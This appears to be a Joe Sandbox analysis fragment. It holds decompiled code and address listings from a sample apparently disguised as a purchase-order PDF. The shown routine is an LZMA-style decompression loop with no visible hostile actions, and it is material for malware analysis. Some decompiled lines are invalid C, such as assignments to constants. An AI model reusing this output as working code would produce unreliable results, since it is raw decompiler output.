														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
